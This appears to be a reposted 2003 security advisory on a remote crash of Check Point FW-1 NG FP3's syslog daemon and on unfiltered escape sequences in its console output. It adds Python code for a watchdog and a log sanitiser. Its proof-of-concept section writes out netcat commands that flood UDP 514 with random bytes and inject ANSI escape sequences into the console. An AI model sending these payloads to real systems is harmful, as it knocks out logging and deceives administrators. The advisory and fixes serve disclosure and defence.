22nd Mar 2003 [SBWID-6087]
COMMAND
	Check Point DoS attack against syslog daemon
SYSTEMS AFFECTED
	Check Point FW-1 NG FP3 & FP3 HF1
PROBLEM
	Thanks to Peter of (P) & (C) 2003 AERAsec Network Services and Security
	GmbH, advisory:
	
	 http://www.aerasec.de/security/advisories/checkpoint-fw1-ng-fp3-syslog-crash.html
	 http://www.aerasec.de/security/index.html?id=ae-200303-064
	
	--snip--
	* Successful DoS from remote against syslog daemon of Check  Point  FW-1
	NG FP3 (also FP3 HF1), perhaps remote root exploit possible.
	* Syslog message containing escape sequences directed to  syslog  daemon
	of Check Point FW-1 NG FP3 (including HF1  and  HF2)  remain  unfiltered
	and cause strange output behaviour if the log is viewed on console.
	--snip--
	Check Point VPN-1/FW-1 NG FP3 contains a syslog  daemon  (default:  off)
	to redirect incoming syslog  messages  from  remote  (e.g.  routers)  to
	Check Point's SmartTracker logging mechanism. This syslog daemon can  be
	crashed from remote and will not start again automatically. Neither does
	a watchdog service detect the crash, nor does an entry about  the  no
	longer available syslog daemon appear in the SmartView Tracker.
	Additionally, it prints all characters received in a syslog message from
	remote without any modification. This means escape sequences are neither
	filtered nor, e.g., expanded to their octal values in ASCII.
	--snip--
	 Proof of concept
	 ================
	 1
	 =
	Start the syslog daemon by enabling it in the firewall object (and  run
	cpstop/cpstart afterwards) or by executing it by hand:
	
	[firewall]# /opt/CPfw1-50-03/bin/syslog 514 all
	Shutting down kernel logger:                               [  OK  ]
	Shutting down system logger:                               [  OK  ]
	Starting system logger:                                    [  OK  ]
	Starting kernel logger:                                    [  OK  ]
	
	Segmentation fault <- caused after receiving random  syslog  payload,
	see below
	Check for listening syslog daemon:
	
	 [firewall]# netstat -lnptu |grep -w 514
	 udp     0    0 0.0.0.0:514          0.0.0.0:*    $pid/syslog
	
	Note also that this daemon is running as "root":
	
	 # ps -ux | grep -w syslog
	 root      $pid  0.0  6.8 148064 8612 ?       S    12:17   0:00 syslog 514 all
	
	Send a valid syslog message from  a  remote  host  (here  also  a  Linux
	system):
	
	 [evilhost]# echo  "<189>19: 00:01:04: Test" | nc -u firewall 514
	
	Send random payload via syslog message from a remote host:
	
	 [evilhost]# cat /dev/urandom | nc -u firewall 514
	
	The previously started syslog daemon should crash after  a  short  time;
	use "netstat" to see whether a daemon is still listening on UDP port 514.
	Note: for a clean restart of Check Point's syslog  daemon  the  firewall
	service needs to be restarted.
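	The advisory points out that nothing on the firewall notices the dead syslog daemon. The following watchdog is an added example (not part of the AERAsec advisory and not Check Point code): it parses `netstat -lnptu` output of the form shown above and reports whether a UDP socket is still bound to port 514. The two netstat samples, including the PIDs and program names, are constructed for the example.

```python
import re
import subprocess

# Constructed sample of `netstat -lnptu` output while the syslog daemon is
# listening; the PIDs and program names are made up for this example.
SAMPLE_NETSTAT_UP = """\
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      812/sshd
udp        0      0 0.0.0.0:514             0.0.0.0:*                           4711/syslog
"""

# Constructed sample after the daemon has segfaulted: the UDP 514 line is gone.
SAMPLE_NETSTAT_DOWN = """\
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      812/sshd
"""

# One socket line: proto, the two queue counters, local addr:port, foreign
# address, an optional TCP state, then "pid/program" (or "-" if unknown).
_SOCKET_RE = re.compile(
    r"^(?P<proto>tcp6?|udp6?)\s+\d+\s+\d+\s+"
    r"(?P<addr>\S+):(?P<port>\d+)\s+\S+\s+"
    r"(?:[A-Z_]+\s+)?(?P<prog>\S+)\s*$"
)


def parse_listeners(netstat_output):
    """Return (proto, local_addr, port, pid/program) for every socket line."""
    listeners = []
    for line in netstat_output.splitlines():
        m = _SOCKET_RE.match(line)
        if m:
            listeners.append((m.group("proto"), m.group("addr"),
                              int(m.group("port")), m.group("prog")))
    return listeners


def syslog_daemon_alive(netstat_output, port=514):
    """True if some UDP socket is still bound to the syslog port."""
    return any(proto.startswith("udp") and p == port
               for proto, _addr, p, _prog in parse_listeners(netstat_output))


def check_live_host(port=514):
    """Run netstat on this host; returns None when netstat is not available."""
    try:
        out = subprocess.run(["netstat", "-lnptu"], capture_output=True,
                             text=True, check=False).stdout
    except OSError:
        return None
    return syslog_daemon_alive(out, port)


if __name__ == "__main__":
    for label, sample in (("up", SAMPLE_NETSTAT_UP), ("down", SAMPLE_NETSTAT_DOWN)):
        if syslog_daemon_alive(sample):
            print(f"{label}: UDP 514 listening")
        else:
            print(f"{label}: UDP 514 NOT listening - restart the firewall service")
```

	Run periodically (e.g. from cron) on the enforcement module, a "not listening" result is the signal to restart the firewall service, since the advisory notes the daemon does not come back on its own.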
	 2
	 =
	Enable receiving of syslog messages from remote on FW-1,  e.g.  as  described
	above.
	View the log on the console by running the following command:
	
	 [firewall]# fw log -nfnl
	
	Send some special escape sequences via syslog, e.g.
	
	[evilhost]# echo -e "<189>19: 00:01:04:Test\a\033[2J\033[2;5m\033[1;31mHACKER~ATTACK\033[2;25m\033[22;30m\033[3q" | nc -u firewall 514
	
	Take a look at the console again, but  don't  be  scared  too  much  for
	now... Press CTRL-C and reset the console to standard by executing:
	
	 [firewall]# reset
	
	Attackers might send a lot of "special" escape sequences; for  Linux  as
	destination see "man console_codes" for more.
	Note: the standard syslog daemon on a RHL 7.3 system renders code  like
	this as shown here:
	
	Mar 14 13:29:30 linuxbox 19: 00:01:04: Test^G^[[2J^[[2;5m^[[1;31mHACKER ATTACK ^[[2;25m^[[22;30m^[[3q
	
SOLUTION
	Solutions to prevent the successful DoS attack against syslog service:
	- Upgrade to FP3 HF2 (available since 14 March 2003) as soon as possible;
	for more information see:
	
	 http://www.checkpoint.com/techsupport/ng/fp3_hotfix.html
	
	- Customize your ruleset and accept syslog messages only from  dedicated
	(and trusted, see below) senders by the enforcement module
	Solutions to prevent unfiltered console output:
	- Filter log output by using "tr" like:
	
	 [firewall]# fw log -tfnl | tr '\000-\011\013-\037\200-\377' '*'
	
	(all chars with ASCII codes from decimal 0-31 and 128-255 except 10  for
	LF are replaced by a '*')
	- Update Check Point's syslog daemon to a newer version once again, when
	available:
	
	 http://www.checkpoint.com/techsupport/alerts/syslog.html
	
	- Improve ruleset like suggested above.
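	The "tr" filter above throws away every control byte; the advisory also mentions the alternative of expanding them to octal, and the RHL 7.3 syslogd output shown earlier uses caret notation. The following is an added example (not from the AERAsec advisory and not Check Point or sysklogd code) that implements all three renderings on the raw message bytes and, for detection, lists the ANSI CSI sequences and stray C0 control bytes a message carries, so a log pipeline can both neutralise and alert on them. The sample payload is constructed after the second proof of concept; the decision to show DEL as ^? and bytes above 127 as octal in the caret style is this example's own choice. When using the page's tr pipeline directly, run it with LC_ALL=C so the byte ranges are interpreted unambiguously.

```python
import re

# Constructed payload modelled on the advisory's second proof of concept
# (BEL plus several ANSI CSI sequences); not captured from a real system.
SAMPLE_PAYLOAD = (b"<189>19: 00:01:04:Test\a\x1b[2J\x1b[2;5m\x1b[1;31m"
                  b"HACKER~ATTACK\x1b[2;25m\x1b[22;30m\x1b[3q")

# ANSI CSI sequence: ESC '[' parameter bytes, intermediate bytes, final byte.
_CSI_RE = re.compile(rb"\x1b\[[0-9;?]*[ -/]*[@-~]")


def sanitize_tr_style(data):
    """Same effect as the advisory's tr filter: bytes 0-31 (except LF) and
    128-255 are replaced by '*'."""
    return "".join("*" if (b < 32 and b != 10) or b >= 128 else chr(b)
                   for b in data)


def sanitize_caret_style(data):
    """Render C0 bytes as ^X like the RHL 7.3 syslogd output on the page
    (BEL -> ^G, ESC -> ^[); DEL becomes ^? and bytes >= 128 become octal
    escapes (this example's own choice, not something the page specifies)."""
    out = []
    for b in data:
        if b < 32 and b != 10:
            out.append("^" + chr(b + 64))
        elif b == 127:
            out.append("^?")
        elif b >= 128:
            out.append("\\%03o" % b)
        else:
            out.append(chr(b))
    return "".join(out)


def sanitize_octal_style(data):
    """Expand every non-printable byte to its octal value, e.g. ESC -> \\033."""
    return "".join("\\%03o" % b if (b < 32 and b != 10) or b >= 127 else chr(b)
                   for b in data)


def find_control_sequences(data):
    """List the CSI sequences and stray C0 control bytes in a message, in
    message order, so a log pipeline can alert on them. TAB, LF and CR are
    tolerated as ordinary whitespace."""
    findings = []
    covered = set()
    for m in _CSI_RE.finditer(data):
        findings.append((m.start(), "CSI " + m.group()[2:].decode("ascii")))
        covered.update(range(m.start(), m.end()))
    for i, b in enumerate(data):
        if i not in covered and ((b < 32 and b not in (9, 10, 13)) or b == 127):
            findings.append((i, "C0 0x%02x" % b))
    findings.sort()
    return [label for _, label in findings]


if __name__ == "__main__":
    print("tr   :", sanitize_tr_style(SAMPLE_PAYLOAD))
    print("caret:", sanitize_caret_style(SAMPLE_PAYLOAD))
    print("octal:", sanitize_octal_style(SAMPLE_PAYLOAD))
    for finding in find_control_sequences(SAMPLE_PAYLOAD):
        print("flagged:", finding)
```

	The octal and caret renderings keep the evidence of what was sent (useful when investigating who is injecting sequences into the logs), whereas the tr style only makes the console safe; a message for which find_control_sequences returns anything is worth a rule in whatever monitors the firewall's log feed.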